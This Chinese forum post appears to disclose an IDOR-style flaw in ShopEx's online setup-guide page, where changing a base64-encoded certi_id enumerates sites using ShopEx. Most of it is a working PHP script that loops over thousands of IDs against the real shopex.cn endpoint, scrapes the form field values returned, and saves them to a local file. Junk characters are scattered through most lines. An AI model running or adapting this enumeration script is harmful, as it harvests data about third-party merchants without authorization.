|
|
简要描述:0 {+ b" q: \4 _
ShopEx某接口缺陷,可遍历所有网站) T- `: m3 B* L
详细说明:
7 P4 l+ p: H3 z1 E% A问题出现在shopex 网店使用向导页面 , J' t7 V' D" ~ \) w3 H! k* c
) a2 C4 V( a/ L2 R3 a& G h3 z# q
( Q% L8 f9 w8 @" {8 @( R; f# M- p! x' a% l
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
$ X$ |0 n3 s; v+ s0 T3 K) ~; ?1 Y, M! _+ f5 u
7 W7 P% w* k5 |( L' R
4 p; Q1 @- D$ J$ ~5 N i9 qrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}, Z8 B& ~2 V8 l5 L& Q2 l
& Y/ Z/ z( ^+ n Q$ E
# I5 G8 j9 ~" A' y5 R( _/ B
6 N- f) o6 l7 Y7 o( S我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 1 t) U* _4 D( l
% N) ]/ O' |+ f7 h$ ~% F0 x
% d3 C# r8 y: ^- O1 n" s# E$ h9 N' o3 r m7 R
<?php. i( L, c# u2 Y3 K; v U$ g. I8 F
- o! _) N' J3 y
for ($i=1; $i < 10000; $i++) { //遍历3 m0 d! a, x3 a7 e j
6 D+ u5 Q* [- t2 S! ~4 _6 M H
ShowshopExD($i);
0 C" V) _. q, p" n, L2 h6 n/ W! ?# `( e8 I2 }7 c
}
6 W4 E: R: { Q" j+ o
6 T& }% z' E: o& g# h function ShowshopExD($cid) {
; v# Q6 ^: t8 y& k: L9 [8 t5 \4 p- B) J$ N! W& F
$url='http://guide.ecos.shopex.cn/step2.php';
6 `3 M Q; t9 S8 q+ b" L
' }5 v) i" f. f( j9 ^. E- ^8 C $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ q5 `# e j8 F
, e4 \6 w6 s; p9 r $url = $url.'?refer='.$refer;
( x6 \0 l6 x) t
3 y2 @# o# B. Y $ch = curl_init($url);3 f% v$ p1 I$ u! V1 ?3 L
E' ?" H* e% D8 P6 V# _5 T
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;* ]7 {* E; t5 |9 t: A
+ y' p1 B6 J z% A( h3 d curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
7 Y/ l J. ]& w( r" E* a) N; f# g( u% x
$result = curl_exec($ch);6 t* H0 e& g( k4 C
9 N/ u) {4 r: U* J! D7 o, K$ [, d
$result = mb_convert_encoding($result, "gb2312", "UTF-8");4 K( G: J4 t6 N8 w* \: w% Z* j: Q
8 i0 K; y! N H* o if(strpos($result,$refer))
4 d2 q$ |( Z7 S$ K2 b. q
$ \: `! g% e8 Y+ I. ], e {0 {0 R! P; d7 v% T9 K, Q8 R1 S7 _. w
4 z, k) }6 f9 X8 g1 G9 A( j& S $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
; j1 w# g* O0 N0 { w0 m: K0 e9 n5 D6 h
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value); g* }! A5 s: X5 q' v
( B3 n! y! k: ^; e. f foreach ($value[1] as $key) {2 M) u: ?/ O' Y$ r, K* {$ G. f
E+ m# t i5 ` preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
2 n& p3 u; q" L$ k! \6 h) ~
+ ^( [$ T$ Y; D) z echo $res[1][0].':'.$res[3][0]."\r\n";6 @0 }+ x4 W) x- i0 A0 Y3 S6 X
9 f* `, b* s1 L; z $col =$res[1][0].':'.$res[3][0]."\r\n";
' o/ X# H/ D$ v( F, t9 o) t3 n0 C3 f/ s! M9 x+ e# j0 S
fwrite($fp, $col, strlen($col));
. F$ \4 D# v2 f9 p j! h4 Y. o" ^; }6 l$ X0 c: }
}
- Z1 s: F! C1 n5 B) b( y
1 j* P5 ~5 @* W' A2 e echo '--------------------------------'."\r\n";5 }! ?) {& B/ @' B& A8 V
/ ?* A: H. b6 D [1 ?7 d fclose($fp);
6 u0 U8 F: e! V( T* |
9 P/ ]9 q9 l7 |! a8 { }
% Q! l8 V4 n Y# V. ]; Z) C0 c: C+ O1 n& y3 H& U
flush();1 J$ R3 X8 A1 _ Y; `5 Q5 B' [
* X( ~( @" a1 O1 X& m+ ~ I curl_close($ch);
" L8 G" e& p- ], \: w3 o q( i3 T/ S' Z; s# Q I1 ]
}
$ Z8 w+ g& m7 y- @4 D- O B
9 ^8 [, q$ m0 z6 k8 ?) c3 W?>
* `) b& y' m( P& x: T3 C0 C) V: A% Y漏洞证明:
' }+ _5 a n' r0 ]) E: I, Q+ lhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg. k- f2 y) y# t" |2 T
refer换成其他加密方式
$ i5 S4 _" a% u1 z! i |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对